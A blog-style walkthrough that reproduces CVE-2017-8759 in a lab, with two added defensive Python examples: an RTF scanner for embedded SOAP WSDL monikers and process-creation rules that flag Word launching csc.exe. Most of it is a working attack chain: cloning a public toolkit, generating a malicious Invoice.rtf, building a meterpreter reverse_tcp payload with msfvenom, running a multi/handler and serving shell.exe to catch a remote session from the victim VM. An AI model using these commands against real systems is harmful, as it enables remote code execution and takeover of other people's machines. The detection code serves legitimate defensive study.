Reproducing CVE-2017-8759

Vulnerability write-up: http://www.freebuf.com/articles/system/147602.html

PoC repository: https://github.com/bhdresh/CVE-2017-8759

Kali 2.0 was too sluggish, so I dropped it; I am currently using Parrot.

First, download the PoC locally with:

git clone https://github.com/bhdresh/CVE-2017-8759


Enter the CVE-2017-8759 folder and open README.md to see how the toolkit is used:

sudo pluma README.md


###### Example commands
1) Generate malicious RTF file
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Optional, if using MSF Payload) : Generate metasploit payload and start handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Start toolkit in exploit mode to deliver local payload
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

We first generate a malicious RTF file with the command python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.0.124/test.txt (run ifconfig first to check your own IP and replace the IP in the command with yours; mine here is 192.168.0.124).


It generated successfully; run ls to confirm the file is there.
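From the defender's side, the interesting question is what such a document looks like to a file scanner. The following is an added example, not code from the original post or from the bhdresh toolkit: it pulls the hex-encoded OLE object out of every `\objdata` group in an RTF and reports any SOAP moniker display name ("soap:wsdl=<url>", the indicator assumed here) it finds, which is the external WSDL reference the -u option above points at. The sample RTF and the OLE blob layout are constructed for this example and only reuse the URL from the walkthrough.

```python
import re

# Indicator assumed for this example: the SOAP moniker abused by CVE-2017-8759 is
# identified inside the OLE object by a display name of the form "soap:wsdl=<url>",
# where <url> is the attacker-hosted WSDL handed to the toolkit's -u option.
SOAP_MARKER = b"soap:wsdl="
_SOAP_MARKER_UTF16 = SOAP_MARKER.decode("ascii").encode("utf-16-le")

# \objdata groups hold the OLE object as hex text, usually wrapped over many lines.
_OBJDATA_RE = re.compile(r"\\objdata\s*([0-9A-Fa-f\s]+)")
_ASCII_URL_RE = re.compile(rb"soap:wsdl=([\x21-\x7e]+)")


def extract_objdata_blobs(rtf_text: str) -> list:
    """Decode every \\objdata hex group in the document into raw bytes."""
    blobs = []
    for m in _OBJDATA_RE.finditer(rtf_text):
        hexdata = re.sub(r"\s+", "", m.group(1))
        if len(hexdata) % 2:        # tolerate a truncated trailing nibble
            hexdata = hexdata[:-1]
        if hexdata:
            blobs.append(bytes.fromhex(hexdata))
    return blobs


def find_wsdl_urls(blob: bytes) -> list:
    """Return every URL that follows a SOAP moniker marker, in ASCII or UTF-16LE."""
    urls = [m.group(1).decode("ascii") for m in _ASCII_URL_RE.finditer(blob)]
    pos = 0
    while True:
        i = blob.find(_SOAP_MARKER_UTF16, pos)
        if i < 0:
            break
        j = i + len(_SOAP_MARKER_UTF16)
        chars = []
        # Walk 16-bit code units; the first non-printable unit ends the URL.
        while j + 1 < len(blob):
            code = int.from_bytes(blob[j:j + 2], "little")
            if not 0x21 <= code <= 0x7E:
                break
            chars.append(chr(code))
            j += 2
        if chars:
            urls.append("".join(chars))
        pos = j
    return urls


def scan_rtf(rtf_text: str) -> dict:
    """Summarise embedded objects and flag any that reference an external WSDL."""
    blobs = extract_objdata_blobs(rtf_text)
    urls = [u for b in blobs for u in find_wsdl_urls(b)]
    return {"object_count": len(blobs), "wsdl_urls": urls, "suspicious": bool(urls)}


# --- constructed sample input (not a real exploit document) -------------------
def build_rtf_with_object(blob: bytes) -> str:
    """Wrap an OLE blob in a minimal RTF skeleton the way Word would store it."""
    hexdata = blob.hex()
    wrapped = "\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
    return (
        r"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}\pard Invoice attached.\par"
        r"{\object\objautlink\objupdate{\*\objdata " + wrapped + "}}}"
    )


# A made-up OLE header followed by a moniker display name pointing at the same
# URL the walkthrough passes to the toolkit.
CONSTRUCTED_BLOB = (b"\x01\x05\x00\x00\x02\x00\x00\x00"
                    + b"soap:wsdl=http://192.168.0.124/test.txt" + b"\x00" * 4)
CONSTRUCTED_RTF = build_rtf_with_object(CONSTRUCTED_BLOB)
BENIGN_RTF = r"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}\pard Hello.\par}"

if __name__ == "__main__":
    for name, doc in (("constructed", CONSTRUCTED_RTF), ("benign", BENIGN_RTF)):
        print(name, scan_rtf(doc))
```

Both encodings are searched because OLE streams carry strings in either form; a scanner that only checks ASCII misses the Unicode variant. A hit on `wsdl_urls` is a strong signal on its own, since an ordinary business document has no reason to embed an object that fetches a WSDL from a remote host.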


Step two: generate the payload with msf.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your listening port> -f exe > /tmp/shell.exe


Then start msf with msfconsole; this takes a while.

Once it is up, configure msf:

msf > use exploit/multi/handler 
msf exploit(handler) > set payload set payload windows/meterpreter/reverse_tcp
[-] The value specified for payload is not valid.
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf exploit(handler) > set lhost 192.168.0.124
lhost => 192.168.0.124
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.124 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.0.124:4444


The listener is up; now the final step:

python cve-2017-8759_toolkit.py -M exp -e http://192.168.0.124/shell.exe -l /tmp/shell.exe


Drag the rtf file onto the Win7 virtual machine and open it.
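Opening the document is the moment CVE-2017-8759 actually fires: the .NET WSDL parser turns attacker-controlled WSDL content into C# source and hands it to the framework's compiler, so on the endpoint the tell-tale signal is the Office process spawning csc.exe against a file in the user's temp directory. The following is an added example, not part of the original post, that runs two such rules over process-creation records. The events are constructed for this example (field names loosely modelled on Sysmon's Image, ParentImage and CommandLine; paths and file names are made up) and are not real telemetry.

```python
import ntpath

# Image names of document-handling parents and of the .NET command-line compilers.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
COMPILER_IMAGES = {"csc.exe", "vbc.exe"}
# Compiles driven from the per-user temp directory are unusual for a logged-in user.
TEMP_MARKER = "\\appdata\\local\\temp\\"


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def classify(event: dict) -> list:
    """Return the names of the rules an event trips; an empty list means benign."""
    reasons = []
    image = _basename(event["image"])
    parent = _basename(event["parent"])
    if image in COMPILER_IMAGES and parent in OFFICE_IMAGES:
        reasons.append("office-parent")        # Word/Excel should never build code
    if image in COMPILER_IMAGES and TEMP_MARKER in event["cmdline"].lower():
        reasons.append("temp-compile")         # source/response file lives in %TEMP%
    return reasons


def detect(events) -> list:
    """Run every event through classify() and keep only the hits."""
    hits = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            hits.append({"id": ev["id"], "reasons": reasons})
    return hits


# --- constructed sample events (made up; not captured telemetry) --------------
WINWORD = r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
CSC = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
CONSTRUCTED_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": WINWORD,
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\victim\Desktop\Invoice.rtf"'},
    # The suspicious one: Word launching the C# compiler on a temp response file.
    {"id": 2, "parent": WINWORD, "image": CSC,
     "cmdline": r'"csc.exe" /noconfig /fullpaths @"C:\Users\victim\AppData\Local\Temp\abc123.cmdline"'},
    {"id": 3, "parent": CSC,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     "cmdline": "cvtres.exe /NOLOGO /READONLY"},
    # A developer build from an IDE: same compiler, benign parent and source path.
    {"id": 4, "parent": r"C:\Program Files\Microsoft Visual Studio\devenv.exe", "image": CSC,
     "cmdline": r"csc.exe /target:exe /out:C:\src\app\bin\app.exe C:\src\app\Program.cs"},
    # Word spawning the print spooler helper is normal and must not alert.
    {"id": 5, "parent": WINWORD, "image": r"C:\Windows\splwow64.exe",
     "cmdline": "splwow64.exe"},
]

if __name__ == "__main__":
    for hit in detect(CONSTRUCTED_EVENTS):
        print(hit)
```

The two rules are deliberately independent: the parent check catches this CVE's delivery through Office, while the temp-path check also covers other code paths that reach the compiler from a script host or a browser plug-in. Note that event 3 (cvtres.exe spawned by csc.exe) is not flagged by itself; tying it back to Word needs the full parent chain, which a real pipeline would reconstruct from process GUIDs.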


We can see the connection come back, but msf on this system seems to have a problem and hangs there.


Press ctrl+c to stop it, then run sessions -l to list the sessions.

Use sessions -i to pick a session.


Success. As for what to do next, I'm sure you experts know better than I do.

Having a PoC makes all the difference.

-------------End of article, thank you for reading-------------